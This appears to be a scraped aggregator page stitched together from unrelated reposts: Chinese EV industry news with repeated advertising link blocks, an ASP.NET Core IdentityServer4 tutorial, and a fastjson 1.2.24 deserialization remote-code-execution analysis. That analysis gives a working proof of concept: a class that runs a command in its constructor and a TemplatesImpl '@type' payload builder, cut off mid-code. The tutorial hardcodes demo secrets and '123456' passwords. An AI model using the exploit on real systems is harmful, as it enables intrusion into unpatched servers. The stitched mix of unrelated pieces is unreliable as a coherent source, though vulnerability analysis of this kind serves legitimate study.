EV續航距離倍增、媲美汽油車!GS傳量產新電池

 

日經新聞8日報導,GS Yuasa將在2020年開始量產可讓電動車(EV)充飽一次電所能行駛的距離擴增至現行2倍的新型鋰離子電池。現行部分EV充飽電所能行駛的距離僅有汽油車的一半左右水準,而搭載GS新型電池將讓EV續航距離增加至可媲美汽油車的水準。GS為全球第4大車用鋰離子電池廠。

報導指出,上述新型電池由GS、三菱商事(Mitsubishi)、三菱汽車(Mitsubishi Motors)合資設立的電池製造公司「Lithium Energy Japan(簡稱LEJ)」所研發,將在2020年透過LEJ工廠進行量產,將供應給日系、歐系車廠使用,價格目標是壓低至同於現行產品的水準。GS、三菱商事、三菱汽車對LEJ的出資比重分別為51%、46%、3%。

根據GS公布的財報資料顯示,上季(2017年4-6月)GS車用鋰離子電池事業營收較去年同期成長4.2%至87.24億日圓、營損額自去年同期的2.17億日圓縮小至1.64億日圓。

法國、英國已紛紛表明計畫在2040年停售汽柴油車,提振EV後續需求料將急速擴大。

富士經濟6月22日公布調查報告指出,預估2030年時EV年銷售量將增至407萬台、超越HV(油電混合車、2030年銷售量預估為391萬台),且之後雙方的差距將持續擴大。富士經濟預估,在中國需求增加加持下,2035年EV全球銷售量將擴大至630萬台、將達2016年的13.4倍(較2016年增加12.4倍)。

(本文內容由授權使用。圖片出處:GS Yuasa)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※帶您來了解什麼是 USB CONNECTOR  ?

※自行創業 缺乏曝光? 下一步"網站設計"幫您第一時間規劃公司的門面形象

※如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

※綠能、環保無空污,成為電動車最新代名詞,目前市場使用率逐漸普及化

※廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

上海新能源汽車展8月23舉行 多款PHEV將亮相

由充電設施線上網、廣東省充電設施協會、廣東省新能源汽車產業協會和振威展覽股份聯合主辦,中國土木工程學會城市公共交通學會協辦的“2017上海國際新能源汽車產業博覽會”將於8月23-25日在上海新國際博覽中心隆重舉行,500多家企業將展出各類新能源汽車、電池、電機、電控和充電設施相關產品。其中,上汽、吉利等大牌車企將攜多款PHEV代表性車型亮相。

PHEV(混合動力汽車)因其高續航里程、有較強的節油減排能力,並且可獲得國家財政補貼而受廣大人民群眾的喜歡。據公開資料顯示,2016年,我國共銷售PHEV80352輛,2017年上半年銷售33000輛。雖然PHEV的產銷量並沒有純電動汽車可觀,但是這並不代表PHEV沒有發展潛力。

 

日前,為了推動我國新能源汽車發展的長效機制,促進新能源汽車的研發和推廣,加強汽車產品節能減排的管理,工信部發佈了《乘用車企業平均燃料消耗量與新能源積分並行管理辦法》(以下簡稱雙積分辦法)。雙積分辦法中對PHEV的積分形式有了明確的規定,也就是說,車企想要獲得積分,不僅僅是純電動汽車這一條路,PHEV同樣能達到積分的目的。另一方面,發展PHEV車型,還可以給消費者提供更多的車型選擇以迎合中國汽車市場消費者需求。

 

此外,插電式混合動力產品對於我國現有汽車車型結構優化,同時對汽車節能將發揮重大意義,利於我國汽車工業的節能減排。同時,混合動力車型對於實現油耗目標值具有較強可行性,尤其是節油效率達40~60%的PHEV車型。因此,在當前政策法規環境下,PHEV車型既能擴大新能源汽車產品結構比例,又能提升單車的節油率,某種意義上,發展PHEV車型是必然。

 

本屆展會上,上汽集團旗下榮威品牌將攜eRX5、ei6和e950等三款PHEV車型亮相。eRX5為一款SUV車型,綜合工況純電續駛里程60KM,油電合計續航里程達650KM,此款車型榮獲DESIGN AWARD2017設計大獎;ei6為一款轎車型,補貼後售價為16.58萬元,綜合工況純電續航里程53KM,油電合計續航里程達705KM;e950綜合工況油耗1.7L/100KM,綜合工況純電續駛里程60KM,油電合計續航里程超過600KM。

 

 

此外,吉利將攜帝豪PHEV亮相本次展會。此次展示是帝豪PHEV進入上海新能源汽車目錄後首度亮上海。帝豪PHEV在中控部分增加了旋鈕式檔位,使車輛可在純電動、混合動力等模式中進行切換,增強了操作的便利性及駕駛體驗。該款車型綜合工況純電續駛里程為61KM,油電合計續駛里程達705公里。

 

 

儘管國內堅持發展新能源車須以純電驅動為主要戰略取向,PHEV車型的發展不受《關於完善汽車投資項目管理的意見》重視,但是車企仍需要抓住這兩年的黃金發展時間,堅持開源,多生產插電式混合動力車型。既要滿足企業所面對的雙積分政策,同時解決市場對新能源汽車續駛里程的高期望,補貼減少對新能源汽車產業產生的負面效應等痛點。因此,本次展會的舉辦對於新能源汽車混合動力產品具有積極的展示作用。促進各界人士對PHEV產品的認識及瞭解。

 

參觀預登記,請點擊:http://www.zhenweiexpo.com/visitors/evse/

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選

中國30餘省市加大政策補貼力道,充電樁建設步爆發期

21經濟網報導,為推進新能源汽車行業健康發展,中國許多城市近期紛紛調整補貼政策,下調整車補貼,上調充電樁補貼。中國國家新能源汽車技術創新工程專家組組長王秉剛表示,現在電動車這條腿已走在前頭,要拉動基礎設施建設這另一條腿。從建設落後到「適度超前」,業內人士預計,未來三年中國充電樁產業將迎來大發展,市場規模預估達千億級(人民幣,下同)。

根據中國深圳財委和深圳發改委日前發佈《深圳市2017年新能源汽車推廣應用財政支持政策》通知,汽車補貼大幅下調。而在此同時,充電樁的補貼則較去年高一倍。其中,新建直流充電設備的補貼標準從原有的300元/千瓦提升到600元/千瓦,交流充電設備補貼從150元/千瓦提升到300元/千瓦。

另據中國國家能源局和中國電動汽車充電基礎設施促進聯盟聯合編制的《中國電動汽車充電基礎設施發展年度報告(2016-2017)》顯示,包括北京、唐山、貴陽、廈門、石家莊等30多個省市均出臺了充電設施建設補貼政策,加大了補貼力道,補貼最高達設施投資的30%。

據充電樁數量最多的北京在8月8日公佈資料,截至今年6月底,累計建成約9.23萬個充電樁,形成六環內平均服務半徑5公里的公用充電網路,且充電樁網路下半年繼續擴建。根據目標,北京將在2020年前建電動汽車充電樁約43.5萬個;其中,今年北京計畫新建3,000個公用充電樁,並研擬對新建建築配套停車場的充電樁數量進行固定配比。

北京將在未來數年迎來充電樁數量大爆發。而事實上,除了北京之外,多地對於充電樁建設的積極性都頗高,例如到2020年,上海市新能源車輛充電樁規模至少達到21.1萬個;廣東將建成分散式充電樁約35萬個。

根據中國《能源發展十三五規劃》,到2020年將建設「四縱四橫」城際電動汽車快速充電網路,新增超過800座城際快速充電站;新增集中式充換電站超過1.2萬座,分散式充電樁則超過480萬個,滿足全國500萬輛電動汽車充換電需求。

不過,政策補貼力道增大的同時,也不斷有建成充電樁使用率低、充電位被燃油汽車佔用等現象發生,由此產生了充電樁「白補貼」的質疑;特別是有了新能源汽車騙補的前車之鑒,對充電樁補貼發放標準從嚴考核的呼聲越來越大。對此,王秉剛建議,應加強對補貼資金發放、使用等的管理和監督並明確制度,應不能建成就能拿補貼,而是有效運行後才能拿補貼。

(本文內容由授權使用。圖片出處:public domain CC0)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※帶您來了解什麼是 USB CONNECTOR  ?

※自行創業 缺乏曝光? 下一步"網站設計"幫您第一時間規劃公司的門面形象

※如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

※綠能、環保無空污,成為電動車最新代名詞,目前市場使用率逐漸普及化

※廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

豐田搭檔7-Eleven,開發氫燃料物流新車

日本汽車大廠豐田近年漸主打氫燃料電池車市場,自2014 年底推出首款燃料電池汽車Mirai 後,2016 年再推氫燃料大巴士Toyota FC Bus,並預計在2020 年的東京奧運會期間出售100 輛,用於接送選手往返賽地。現在,豐田再找上當地連鎖便利商店龍頭7-11 合作,嘗試為冷藏物流車輛搭載氫燃料電池,為節能減碳目標貢獻一己之力。

7-11 和豐田汽車在8 月9 日簽署了二氧化碳減排基本協議,7-11 將引進豐田以氫氣開發的冷藏物流新車輛和發電系統,其中製冷/冷凍機組及車輛本身都可由氫燃料電池供電。此外,他們還將引入可充電的汽車電池,發生自然災害之際可成為應急電源,比如停電時可做為避難場所的電力來源。

氫燃料電池在消耗過程中只會產生水,不會產生任何溫室氣體,但與使用可充電鋰離子電池做為動力來源不同,氫燃料電池車是靠著氫分子和氧分子的化學反應產生電流,再將電力送到鋰電池組和馬達驅動車輛前進。

2020 年東京奧運會期間出售的氫燃料巴士每台約100 萬美元,一台巴士備有600 公升的氫氣、一對電動馬達,提供200 公里續航力,總功率為306 匹馬力和494 磅英尺(670 牛頓米),僅需10 分鐘就能將氫氣加滿。

同時,豐田也在美國加州進行氫燃料電池供電的半掛卡車研究。不過,美國目前仍缺乏加氫站等基礎設施建設,除加州外,燃料電池車想要在全美進行銷售幾乎不可能,而整個加州也僅有不到20 個加氫站,許多站點還會因為維修問題關閉數週。

此外,氫氣並不是可從自然界中直接抓取的氣體,目前主要透過電解水或甲烷製氫兩種方式取得,唯電解水生成氫氣的能源轉化率約25% 左右,而甲烷製氫的代價是產生一氧化碳,並沒有比較划算。

不過, 豐田北美燃料電池開發項目經理Giorgio Zoia 胸有成竹地說,豐田的氫燃料電池將可以為重型運輸帶來革新風貌。目前已有廠商嘗試用太陽能發電來電解水,Zoia 表示,加州的太陽能農場在白天產生過多的電,加州電網有超載危機,如果這些多餘的太陽能發電被拿來做為電解水供電,並將產生的氫氣送到洛杉磯供電,則氫基工業基礎設施將開始成形。

(合作媒體:。圖片出處:Toyota)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選

搶當環保車二哥!現代推新型燃料電池車,續航增40%

韓聯社報導,南韓汽車業龍頭現代汽車(Hyundai Motor)17日在首爾公開了新型燃料電池車(FCV),並預計於2018年初開賣。和現代汽車現行FCV車款「Tucson」相比,新型FCV的氫燃料電池系統的效率、性能、耐久性、儲存容量都有劃時代的提升,充填一次燃料(氫)所能行駛的距離可較現行的415km大幅提升約40%至580km,且預定將搭載先進駕駛輔助系統(Advanced Driver Assistance Systems;ADAS)。   現代汽車並宣布,計畫在2020年結束前將環保車(Eco-car)車款數量自現行的14款倍增至31款,其中油電混合車(HV)為10款、插電式油電混合車(PHV)11款、電動車(EV)8款、FCV 2款,目標是在全球環保車市場上成為僅次於日本豐田(Toyota)的第2大廠。   日經新聞報導,現代汽車上述新型FCV預計於2018年Q1搶先在南韓市場開賣,而現代汽車幹部指出,「預計將在2018年下半年搶進歐美及澳洲市場,且也計畫在中國市場進行販售」,期望藉此在FCV市場上追擊跑在前頭的豐田。現代汽車上述新型FCV馬達輸出為163馬力、高於豐田「MIRAI」的154馬力。   報導並指出,現代汽車也宣布,計畫在2018年上半年開賣充飽一次電可行駛390km的SUV款EV,且現代汽車也正著手研發續航距離可達500km的EV。   豐田汽車社長豐田章男2016年1月接受日經/金融時報聯訪時表示,「今後100年將是環保車的時代」,他說,「汽車產業過去1個世紀來,主要以汽油引擎為主流,不過下一個100年,燃料電池車、插電式油電混合車等各種環保車需求將增長」。   富士經濟6月22日公布調查報告指出,現行環保車種以HV需求最大,預估截至2025年左右為止,HV仍將是環保車種的主流產品,不過PHV、EV在2025年以後需求將急速增加,預估2030年時EV年銷售量將增至407萬台、超越HV(2030年銷售量預估為391萬台),且之後雙方的差距將持續擴大。   富士經濟預估,在中國需求增加加持下,2035年EV全球銷售量將擴大至630萬台、將達2016年的13.4倍(較2016年增加12.4倍)。   (本文內容由授權使用)  

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※帶您來了解什麼是 USB CONNECTOR  ?

※自行創業 缺乏曝光? 下一步"網站設計"幫您第一時間規劃公司的門面形象

※如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

※綠能、環保無空污,成為電動車最新代名詞,目前市場使用率逐漸普及化

※廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

中國電動車專委會:固態電池將是下個趨勢產業

中國北京理工大學電動車輛國家工程實驗室、中國電工技術學會電動車輛專業委員會委員孫立清17日於第六屆中國鋰電新能源產業生態大會接受中證網專訪時表示,固態電池將是下一個「風口」,這主要因此類電池將使電動汽車充電時間短,續航里程長,而這正是新能源電池未來主要發展趨勢。

孫立清認為,未來新能源汽車電池領域將會呈現多元化發展,多種材料電池共生共存,而矽碳電池發展空間較大,因其原材料取之不盡。

孫立清還指出,新能源汽車頻繁的事故說明了新能源汽車還有非常大的改進空間,新能源汽車發展任重道遠,未來企業需要在提升品質、增加效率、確保安全、促進產量方面下功夫。其中,增加效率方面,需要達成輕量化、高效動力系統、能量再生回饋;在確保安全方面,要確保整車安全、電池組成組安全、高壓控制安全;促進產量方面,則可從新型製造技術、自動化管理、裝備三方面著手。

(本文內容由授權使用)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選

第二屆上海-斯圖加特汽車及動力技術國際研討會2017

第二屆上海斯圖加特汽車及動力技術國際研討會2017

2017年10月26日-27日/ 中國·上海

 

在上海市及政府斯圖加特市政府的指導下,利用同濟大學和斯圖加特大學各自的學科優勢和研發成果,“2017上海-斯圖加特汽車及動力技術國際研討會”將於2017年10月26日-27日在上海召開。

 

大會以“汽車輕量化、智慧網聯、綠色汽車”為主題,將研討汽車整車設計和輕量化、智慧底盤與電驅動、環境感知技術、氫能與燃料電池、車用電源技術等,屆時全球400多位行業專家將集聚一堂,共同探討新能源汽車產業的前沿發展,共同建立聯繫,促進合作!

 

參會者可以以論文投稿的形式參與此次會議,論文審核組委會將負責從所有參會者所投稿件中遴選出品質較高的優秀學術論文,在會議當天進行學術性報告演講,並在同濟大學學報增刊(100%EI期刊檢索)上進行發表。

 

大會亮點:

3大論壇涉及9個主題內容專業豐富的會議

40篇論文,100%EI檢索

45位海內外權威發言嘉賓

400+知名行業人士蒞臨

 

我們期待與貴單位一起出席於2017年10月26日-27日在中國上海舉辦的上海-斯圖加特汽車及動力技術國際研討會,以利決策!

 

更多會議資訊,請登錄會議官方網站:http://www.sssaet.com/index_cn.htm

連絡人:Latika LIU(劉小姐)

電話:021-6093 0815

傳真:021-6047 5887

郵箱:

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※帶您來了解什麼是 USB CONNECTOR  ?

※自行創業 缺乏曝光? 下一步"網站設計"幫您第一時間規劃公司的門面形象

※如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

※綠能、環保無空污,成為電動車最新代名詞,目前市場使用率逐漸普及化

※廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

看好電動車!LG電子擬砸2500萬美元、赴美建零件廠

看好電動車前景,LG電子23日宣布斥資2,500萬美元,要在美國興建電動車零件廠房。

The Investor、ET News報導,LG廠房將座落在底特律郊區Hazel Park,預定2018年初完工,一開始將為電動車供應電池組,未來還會提供更多關鍵零組件。

LG指出,去年美國的電動車合併銷售量為104,178台,跟中國(電動車銷售量為257,929台)、歐洲(108,649台)並列全球前三大電動車市場。

LG估計,至2020年為止,美國電動車市場每年平均可望成長65.5%。

這座廠房除了將供應通用汽車(GM)的電動車「Bolt」之外,也不排除向福特(Ford)、飛雅特克萊斯勒汽車(Fiat Chrysler Automobiles, FCA)爭取電動車零件訂單。

Electrek,福斯汽車(Volkswagen)研發部主管Ulrich Eichhorn 6月底就曾預估,業界需要多達40座規模跟特斯拉Gigafactory類似的超大電池廠,才能滿足電動車需求,假如新建礦場、工廠無法如期上線,那麼市場恐陷入短缺。

根據Eichhorn的估計,到了2025年,光是福斯集團就需要用到200 GWh的車用電池,至於其他汽車製造商,屆時也會有25%的產能屬於電動車。他是以Gigafactory的年產能可達35 GWh進行推估。

(本文內容由授權使用。圖片出處:public domain CC0)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選

Asp.net Core 系列之–5.認證、授權與自定義權限的實現

ChuanGoing 2019-11-24

  asp.net core系列已經來到了第五篇,通過之前的基礎介紹,我們了解了整個流程,實現,並且簡單的介紹了實現,結合上一篇的和本篇將要介紹的權限,大致的可以形成一個簡單的後端系統架構。當然這些都是零散的一些技術概念的介紹,後面如果有時間的話,我想詳細的介紹下如何利用領域驅動來實現一個實際案例。

話不多講,下面來看下本篇的學習曲線:

1.認識Identityserver4

2.Identityserver4實現認證與授權

3.自定義權限的實現

認識Identityserver4

  關於Identityserver4(ids4)的概念介紹,請查看一文。我這裏要說的是,asp.net core 下的ids4集成了認證與授權兩大功能,使得我們非常方便的實現一個開放的認證與授權平台,比如公司內部多個系統的集成登錄(單點登錄)/第三方系統數據共享/統一的認證中心等。整個業務流程大致為:

1.用戶首先的有用戶中心的賬號信息,因此需要註冊一個賬號

2.用戶訪問某個站點應用,需要去到用戶中心認證

3.認證通過,用戶得到其在用戶中心註冊的相應信息及其權限時限、範圍、大小

4.認證不通過,即非法用戶,提示用戶註冊

5.在第3步的前提下,若用戶訪問到另一個站點(採用同一認證平台),這時用戶可以用之前認證通過後拿到的訪問令牌訪問此站點,若此令牌中包含此站點的相應權限即可之前登錄。

Identityserver4實現認證與授權

首先,新建一個asp.net core web 空項目,並且添加如下IdentityServer4 Nuget包

在ConfigureServices添加如下代碼

註冊IdentityServer中間件,如下5個配置分別表示:

1.AddDeveloperSigningCredential:開發模式下的簽名證書,開發環境啟用即可

2.AddInMemoryApiResources:相關資源配置

public static IEnumerable<ApiResource> GetApiResources()
        {
            return new List<ApiResource>
            {
                new ApiResource("WebApi", "ChuanGoingWebApi"),
                new ApiResource("ProductApi", "ChuanGoingWebProduct")
            };
        }

GetApiResources

這裏配置了兩個Api資源

3.AddInMemoryIdentityResources:OpenID Connect相關認證信息配置

 public static IEnumerable<IdentityResource> GetIdentityResources()
        {
            return new List<IdentityResource>
            {
                new IdentityResources.OpenId(),
                new IdentityResources.Profile()
            };
        }

GetIdentityResources

4.AddInMemoryClients:客戶端信息配置

 public static IEnumerable<Client> GetClients(IConfiguration Configuration)
        {
            var OnlineConfig = Configuration.GetSection("OnlineClient");
            var List = new List<Client>
            {
                new Client()
                {
                    ClientId = "ClientCredentials",
                    AllowedGrantTypes = GrantTypes.ClientCredentials,
                    ClientSecrets = { new Secret("ClientSecret".Sha256()) },
                    AllowedScopes =
                    {
                        IdentityServerConstants.StandardScopes.OpenId,
                        IdentityServerConstants.StandardScopes.Profile,
                        "WebApi",
                        "ProductApi"
                    },
                    AccessTokenLifetime = 10 * 60 * 1
                },

                new Client()
                {
                    ClientId = "ResourceOwnerPassword",
                    AllowedGrantTypes = GrantTypes.ResourceOwnerPassword,
                    ClientSecrets = { new Secret("ClientSecret".Sha256()) },
                    AllowedScopes =
                    {
                        IdentityServerConstants.StandardScopes.OpenId,
                        IdentityServerConstants.StandardScopes.Profile,
                        "WebApi",
                        "ProductApi"
                    },
                    AccessTokenLifetime = 10 * 60 * 1
                },
                  /*
                  隱式模式:https://localhost:6005/connect/authorize?client_id=Implicit&redirect_uri=http://localhost:5000/Home&response_type=token&scope=WebApi
                  */
                new Client()
                {
                    ClientId = "Implicit",
                    ClientName = "ImplicitClient",
                    AllowedGrantTypes = GrantTypes.Implicit,
                    ClientSecrets = { new Secret("ImplicitSecret".Sha256()) },
                    RedirectUris ={OnlineConfig.GetValue<string>("RedirectUris") },
                    PostLogoutRedirectUris = {OnlineConfig.GetValue<string>("LogoutRedirectUris") },
                    AllowedScopes =
                    {
                        IdentityServerConstants.StandardScopes.OpenId,
                        IdentityServerConstants.StandardScopes.Profile,
                        "WebApi",
                        "ProductApi"
                    },
                    AccessTokenLifetime = 10 * 60 * 1,
                    //允許將token通過瀏覽器傳遞
                     AllowAccessTokensViaBrowser=true
                },
                /*
                 * 授權碼模式:https://localhost:6005/connect/authorize?client_id=GrantCode&redirect_uri=http://localhost:5000/Home&response_type=code&scope=WebApi
                 */
                new Client()
                {
                   //客戶端Id
                    ClientId="GrantCode",
                    ClientName="GrantCodeClient",
                    //客戶端密碼
                    ClientSecrets={new Secret("CodeSecret".Sha256()) },
                    //客戶端授權類型,Code:授權碼模式
                    AllowedGrantTypes=GrantTypes.Code,
                    //允許登錄后重定向的地址列表,可以有多個
                     RedirectUris ={OnlineConfig.GetValue<string>("RedirectUris") }, 
                    //允許訪問的資源
                    AllowedScopes={
                        "WebApi",
                        "ProductApi"
                    }
                }
            };
            return List;
        }

GetClients

分別對象Auth2.0的四種模式,本篇將用到的是ResourceOwnerPassword模式,其他幾種可在篇尾github鏈接查看源碼的實現

5.AddTestUsers:用戶配置,可結合緩存/持久化

public static List<TestUser> GetUsers()
        {
            return new List<TestUser>
            {
                new TestUser
                {
                    SubjectId = Guid.NewGuid().ToString(),
                    Username = "admin",
                    Password = "123456"

                    //Claims = new List<Claim>
                    //{
                    //    new Claim("name", "admin"),
                    //    new Claim("website", "https://www.cnblogs.com/chuangoing")
                    //}
                },
                new TestUser
                {
                    SubjectId = Guid.NewGuid().ToString(),
                    Username = "chuangoing",
                    Password = "123456"

                    //Claims = new List<Claim>
                    //{
                    //    new Claim("name", "chuangoing"),
                    //    new Claim("website", "https://github.com/chuangoing")
                    //}
                }
            };
        }

GetUsers

 定義兩個測試用戶,注意這裏的SubjectId,用作用戶中心註冊的openid(認證唯一),後面將會用到

然後,Configure中添加app.UseIdentityServer();//啟用ids4

至此,ids4 服務完成

用postman測試下:

 

返回jwt accesstoken:

 

 

將token內容解碼,如下:

 

 可以看到,裡面包含我們配置的ProductApi/WebApi的權限

將token信息加入到http的header中:

 

  注意Bearer後面有個空格,訪問order的獲取訂單信息:

 

 

 自定義權限的實現

  這裏,我們將api中的action分別定義一個權限代碼,用戶擁有了此action訪問權限(擁有此權限代碼)即可訪問,簡單實現如下:

1.定義權限特性標識,api的action指定某個標識

public class PermissionAttribute : Attribute
    {
        /// <summary>
        /// 權限代碼
        /// </summary>
        public string Code { get; }
        /// <summary>
        /// 
        /// </summary>
        /// <param name="code">權限代碼</param>
        public PermissionAttribute(string code)
        {
            Code = code;
        }
    }

PermissionAttribute

 

 此處,get action定義了訪問權限標識為”XYZ”

同樣,我們這裏需要用到一個權限過濾器,利用過濾器的Aop實現權限過濾業務處理:

 public class PermissionFilter : ActionFilterAttribute
    {
        public override void OnActionExecuting(ActionExecutingContext context)
        {
            var user = context.HttpContext.User;
            if (user.Identity.IsAuthenticated)
            {
                //TODO:用戶自定義權限驗證
                Guid userId = context.HttpContext.GetId();
                bool right;
                #region 自定義權限驗證
                //根據userId判斷用戶內部系統權限信息

                //var userPermissions = repo.GetUserPermissions(userId);
                //var permissions = repo.GetPermissions();
                var metas = context.ActionDescriptor.EndpointMetadata;
                foreach (var meta in metas)
                {
                    if (meta is PermissionAttribute permission)
                    {
                        //if (!permissions.Any(p => permission.Code.Any(c => c == p.Code))
                        //    && !userPermissions.Any(p => permission.Code.Any(c => c == p.Code)))
                        //{
                        //    throw new WebException(HttpStatusCode.Forbidden, MessageCodes.AccessDenied, "你沒有訪問該資源的權限");
                        //}
                        //break;
                    }
                }

                right = false;
                #endregion
                if (!right)
                {
                    context.Result = new ContentResult() { StatusCode = (int)HttpStatusCode.Forbidden, Content = "你沒有訪問該資源的權限" };
                }

            }
        }

PermissionFilter

同時,啟用權限過濾器配置

 

 

部分代碼略過,詳細的請查看篇尾的源碼鏈接

利用第二節的認證授權得到的token,我們用postman測試下:

 

過濾器切面成功工作

 

 

 還記得第一節說的SubjectId么?這裏利用這個openid,去內部系統去匹配相關用戶信息,相關業務就不深入了,有興趣的朋友可以下載示例完善下

 

 至此,整個權限認證、授權、自定義權限介紹完。

WebApi詳細代碼在Github的 的Domain分支可以找到,AuthServer詳細代碼在中。

 

 

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※帶您來了解什麼是 USB CONNECTOR  ?

※自行創業 缺乏曝光? 下一步"網站設計"幫您第一時間規劃公司的門面形象

※如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

※綠能、環保無空污,成為電動車最新代名詞,目前市場使用率逐漸普及化

※廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

fastjson 1.2.24反序列化導致任意命令執行漏洞分析記錄

環境搭建:

漏洞影響版本:

fastjson在1.2.24以及之前版本存在遠程代碼執行高危安全漏洞

環境地址:

正常訪問頁面返回hello,world~

 

此時抓包修改content-type為json格式,並post payload,即可執行rce

 此時就能夠創建success文件

前置知識:

研究這個漏洞之前,先熟悉一下阿里的這個fastjson庫的基本用法

package main.java;

import java.util.HashMap;
import java.util.Map;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.serializer.SerializerFeature;
import main.java.user;
public class test_fast_json {


    public static  void  main(String[] args){
        Map<String,Object> map = new HashMap<String, Object>();
        map.put("key1","one");
        map.put("key2","two");
        //System.out.println(map.getClass());
        String mapjson = JSON.toJSONString(map);
        System.out.println(mapjson.getClass());
        user user1 = new user ();
        user1.setName("111");
        System.out.println(JSON.toJSONString(user1));

        String serializedStr1 = JSON.toJSONString(user1,SerializerFeature.WriteClassName);
        System.out.println("serializedStr1="+serializedStr1);
        user user2=(user)JSON.parse(serializedStr1);
        System.out.println(user2.getName());

        Object obj = JSON.parseObject(serializedStr1);
        System.out.println(obj);
        System.out.println(obj.getClass());

        Object obj1 = JSON.parseObject(serializedStr1,Object.class);
        //user obj1 = (user) JSON.parseObject(serializedStr1,Object.class);
        user obj2 = (user)obj1;
        System.out.println(obj2.getName());
        System.out.println(obj2.getClass());

    }


}
//輸出
class java.lang.String {"age":0,"name":"111"} serializedStr1={"@type":"main.java.user","age":0,"name":"111"} 111 {"name":"111","age":0} class com.alibaba.fastjson.JSONObject 111 class main.java.user

這裏user為定義好的一個類,實際上fastjson提供給我們的也就是將對象快速轉換為可以傳輸的字符串,當然也提供從字符串中恢復出對象,也就是一個序列化和反序列化的過程,

可以從輸出看到,JSON.toJSONstring實際上是將類的屬性值轉化為字符串,當JSON.toJSONstring帶有writeclassname時此時字符串中將包含類名稱及其包名稱,所以此時可以定位到某個類以及其實例化對象的屬性值,再通過JSON.parse()函數即可通過fastjson序列化后的字符串恢復該類的對象,當恢復對象時,使用JSON.parseObject帶有Object.class時,此時能夠成功恢復出類的對象,否則只能恢復到JsonObject對象

漏洞分析:

這個漏洞利用方式有好種,這篇文章主要分析利用templatesImlp這個類,這個類中有一個_bytecodes字段,部分函數能夠根據這個字段來生成類的實例,那麼這個類的構造函數是我們可控的,就能夠rce

 test.java

package person;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Test extends AbstractTranslet {
    public Test() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    @Override
    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {

    }
   
}

test.java在這裏的話主要是用戶parseObject json反序列化時所要還原的類,因為在這會實例化該類,因此直接在其構造方法中calc即可

poc.java

package person;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;


public class Poc {

    public static String readClass(String cls){
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos); //將test.class字節碼文件轉存到字節數粗輸出流中
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray()); 

    }

    public static void  test_autoTypeDeny() throws Exception {
        ParserConfig config = new ParserConfig();
        final String fileSeparator = System.getProperty("file.separator");
        final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class";
        String evilCode = readClass(evilClassPath);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; //autotype時反序列化的類
        String text1 = "{\"@type\":\"" + NASTY_CLASS +
                "\",\"_bytecodes\":[\""+evilCode+"\"]," +    //將evilcode放在_bytecodes處
                "'_name':'a.b'," +
                "'_tfactory':{ }," +
                "\"_outputProperties\":{ }}\n";
